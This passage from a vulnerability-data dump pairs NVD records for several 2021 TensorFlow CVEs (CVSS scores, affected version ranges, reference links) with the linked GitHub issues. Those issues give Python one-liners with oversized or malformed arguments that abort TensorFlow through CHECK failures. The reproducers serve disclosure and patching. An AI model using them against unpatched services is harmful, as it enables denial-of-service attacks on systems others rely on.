"https://github.com/tensorflow/tensorflow/issues/46890" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/51908" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-prcg-wp5q-rv7p" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910", "versionEndExcluding": "2.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C", "versionEndExcluding": "2.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.6.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/tensorflow/tensorflow/issues/46890
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
**System information** - Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04 - Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A - TensorFlow installed from (source or binary): binary - TensorFlow version (use command below):2.1.0 - Python version:3.7.6 - Bazel version (if compiling from source):N/A - GCC/Compiler version (if compiling from source):N/A - CUDA/cuDNN version:N/A - GPU model and memory:N/A **Describe the current behavior** The following APIs crash(abortion) when the given size is large - tf.image.resiz - tf.image.resize_with_crop_or_pad - tf.image.pad_to_bounding_box - tf.image.extract_glimpse - `tf.keras.backend.resize_images` **Describe the expected behavior** expect exception messages if the input is not expected instead of crash **Standalone code to reproduce the issue** ### `tf.image.resize` ~~~python import tensorflow as tf import numpy as np tf.image.resize(images=np.ones((5,5,5)), size=[2065374891,1145309325]) ~~~ Output: ~~~python 2021-02-03 17:41:13.484992: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -6619278462293758741) Aborted (core dumped) ~~~ ### `tf.image.resize_with_crop_or_pad` ~~~python import tensorflow as tf import numpy as np tf.image.resize_with_crop_or_pad(image=np.ones((1,1,1)), target_height=5191549470, target_width=5191549470) ~~~ Output: ~~~python 2021-02-03 17:42:15.468265: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -1) Aborted (core dumped) ~~~ ### `tf.image.pad_to_bounding_box` ~~~python import tensorflow as tf import numpy as np tf.image.pad_to_bounding_box(image=np.ones((1,1,1)), target_height=5191549470, target_width=5191549470, offset_height=1, offset_width=1) ~~~ Output ~~~python 2021-02-03 17:42:52.556583: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -1) Aborted (core dumped) ~~~ ### `tf.image.extract_glimpse` ~~~python import tensorflow as tf import numpy as np tf.image.extract_glimpse(input=np.ones((5,5,5,5)), size=[1574700351, 451745106], offsets=np.ones((5,2))) ~~~ Output: ~~~python 2021-02-03 17:43:30.140277: F tensorflow/core/framework/tensor_shape.cc:338] Check failed: 0 <= n (0 vs. -662664649191246466) Aborted (core dumped) ~~~ ### `tf.keras.backend.resize_image` ~~~python import tensorflow as tf import numpy as np tf.keras.backend.resize_images(x=np.ones((1,5,3,15)), height_factor=5628955348197345288, width_factor=5628955348197345288, data_format='channels_last') ~~~ Output: ~~~python 2021-02-03 17:54:01.192819: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -5948468124908472256) Aborted (core dumped) ~~~
tf.image.resize/resize_with_crop_or_pad/pad_to_bounding_box/extract_glimpse crash(abort)
https://api.github.com/repos/tensorflow/tensorflow/issues/46890/comments
8
2021-02-03T17:44:30Z
2021-10-27T23:23:50Z
https://github.com/tensorflow/tensorflow/issues/46890
800,555,472
46,890
2,763
CVE-2021-41197
2021-11-05T20:15:07.843
TensorFlow is an open source platform for machine learning. In affected versions TensorFlow allows tensor to have a large number of dimensions and each dimension can be as large as desired. However, the total number of elements in a tensor must fit within an `int64_t`. If an overflow occurs, `MultiplyWithoutOverflow` would return a negative result. In the majority of TensorFlow codebase this then results in a `CHECK`-failure. Newer constructs exist which return a `Status` instead of crashing the binary. This is similar to CVE-2021-29584. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46890" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/51908" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-prcg-wp5q-rv7p" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46890" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/51908" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-prcg-wp5q-rv7p" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910", "versionEndExcluding": "2.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C", "versionEndExcluding": "2.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.6.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/tensorflow/tensorflow/issues/51908
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
**System information** - Have I written custom code (as opposed to using a stock example script provided in TensorFlow): Yes - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04 - Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A - TensorFlow installed from (source or binary): binary - TensorFlow version (use command below): 2.6.0 - Python version: 3.6.8 - Bazel version (if compiling from source): N/A - GCC/Compiler version (if compiling from source): N/A - CUDA/cuDNN version: N/A - GPU model and memory: N/A **Describe the current behavior** `tf.pad` crashes when the argument "paddings" has large values. **Describe the expected behavior** Expect an exception to be thrown if the input `paddings` is unexpected. **Standalone code to reproduce the issue** ``` import tensorflow as tf input_tensor = tf.random.uniform([1, 32, 32, 3], dtype=tf.float32) paddings = [[125106557, 1415887920], [747509374, 2136925906], [413308538, 904601717], [1900762018, 831358864]] res = tf.pad(input_tensor,paddings) ``` outputs: ``` 2021-09-09 12:46:38.123113: F tensorflow/core/framework/tensor_shape.cc:352] Check failed: 0 <= new_num_elements (0 vs. -1) Aborted (core dumped) ```
tf.pad crashes with large paddings
https://api.github.com/repos/tensorflow/tensorflow/issues/51908/comments
4
2021-09-09T18:05:47Z
2021-09-13T00:39:36Z
https://github.com/tensorflow/tensorflow/issues/51908
992,494,182
51,908
2,764
CVE-2021-41198
2021-11-05T20:15:07.907
TensorFlow is an open source platform for machine learning. In affected versions if `tf.tile` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow. The number of elements in the output tensor is too much for the `int64_t` type and the overflow is detected via a `CHECK` statement. This aborts the process. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/9294094df6fea79271778eb7e7ae1bad8b5ef98f" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46911" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2p25-55c9-h58q" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/9294094df6fea79271778eb7e7ae1bad8b5ef98f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46911" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2p25-55c9-h58q" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910", "versionEndExcluding": "2.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C", "versionEndExcluding": "2.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.6.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/tensorflow/tensorflow/issues/46911
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
**System information** - Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04 - Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A - TensorFlow installed from (source or binary): binary - TensorFlow version (use command below):2.1.0 - Python version:3.7.6 - Bazel version (if compiling from source):N/A - GCC/Compiler version (if compiling from source):N/A - CUDA/cuDNN version:N/A - GPU model and memory:N/A **Describe the current behavior** `tf.keras.backend.tile` crash(aborts) when `n` is large **Describe the expected behavior** expect an exception message if the input unexpected instead of crash. **Standalone code to reproduce the issue** ~~~python import tensorflow as tf import numpy as np tf.keras.backend.tile(x=np.ones((1,1,1)), n=[100000000,100000000, 100000000]) ~~~ Output ~~~python 2021-02-04 04:10:34.072054: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -1) Aborted (core dumped) ~~~
tf.keras.backend.tile crash(aborts) when n is large
https://api.github.com/repos/tensorflow/tensorflow/issues/46911/comments
4
2021-02-04T04:10:44Z
2021-09-21T01:51:59Z
https://github.com/tensorflow/tensorflow/issues/46911
800,911,545
46,911
2,765
CVE-2021-41199
2021-11-05T20:15:07.970
TensorFlow is an open source platform for machine learning. In affected versions if `tf.image.resize` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow. The number of elements in the output tensor is too much for the `int64_t` type and the overflow is detected via a `CHECK` statement. This aborts the process. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46914" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5hx2-qx8j-qjqm" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46914" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5hx2-qx8j-qjqm" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910", "versionEndExcluding": "2.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "651EA851-E660-4E53-9F3E-B6B69D91326B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/tensorflow/tensorflow/issues/46914
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
**System information** - Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04 - Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A - TensorFlow installed from (source or binary): binary - TensorFlow version (use command below):2.1.0 - Python version:3.7.6 - Bazel version (if compiling from source):N/A - GCC/Compiler version (if compiling from source):N/A - CUDA/cuDNN version:N/A - GPU model and memory:N/A **Describe the current behavior** `tf.keras.layers.UpSampling2D` crashes(aborts) when `size` is large **Describe the expected behavior** expect an exception message if the input unexpected instead of crash. **Standalone code to reproduce the issue** ~~~python import tensorflow as tf import numpy as np tf.keras.layers.UpSampling2D(size=1610637938, data_format='channels_first', interpolation='bilinear')(np.ones((5,1,1,1))) ~~~ Output: ~~~python 2021-02-04 04:44:48.936606: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -5475971237085092396) Aborted (core dumped) ~~~
tf.keras.layers.UpSampling2D crashes(aborts) when size is large
https://api.github.com/repos/tensorflow/tensorflow/issues/46914/comments
5
2021-02-04T04:45:22Z
2023-09-21T09:20:32Z
https://github.com/tensorflow/tensorflow/issues/46914
800,926,370
46,914
2,766
CVE-2021-41200
2021-11-05T20:15:08.037
TensorFlow is an open source platform for machine learning. In affected versions if `tf.summary.create_file_writer` is called with non-scalar arguments code crashes due to a `CHECK`-fail. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46909" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gh8h-7j2j-qv4f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46909" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gh8h-7j2j-qv4f" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910", "versionEndExcluding": "2.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "651EA851-E660-4E53-9F3E-B6B69D91326B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/tensorflow/tensorflow/issues/46909
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
**System information** - Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04 - Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A - TensorFlow installed from (source or binary): binary - TensorFlow version (use command below):2.1.0 - Python version:3.7.6 - Bazel version (if compiling from source):N/A - GCC/Compiler version (if compiling from source):N/A - CUDA/cuDNN version:N/A - GPU model and memory:N/A **Describe the current behavior** `tf.summary.create_file_writer` crash (abort) **Describe the expected behavior** expect an exception message if the input unexpected instead of crash. **Standalone code to reproduce the issue** ~~~python import tensorflow as tf import numpy as np tf.summary.create_file_writer(logdir='', flush_millis=np.ones((1,2))) ~~~ Output: ~~~python 2021-02-04 03:59:32.339427: F tensorflow/core/framework/tensor.cc:669] Check failed: 1 == NumElements() (1 vs. 2)Must have a one element tensor Aborted (core dumped) ~~~
tf.summary.create_file_writer aborts
https://api.github.com/repos/tensorflow/tensorflow/issues/46909/comments
4
2021-02-04T03:59:44Z
2021-08-31T23:59:30Z
https://github.com/tensorflow/tensorflow/issues/46909
800,906,740
46,909
2,767
CVE-2021-41202
2021-11-05T22:15:08.323
TensorFlow is an open source platform for machine learning. In affected versions while calculating the size of the output within the `tf.range` kernel, there is a conditional statement of type `int64 = condition ? int64 : double`. Due to C++ implicit conversion rules, both branches of the condition will be cast to `double` and the result would be truncated before the assignment. This result in overflows. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" } ], "cvssMetricV40": null }
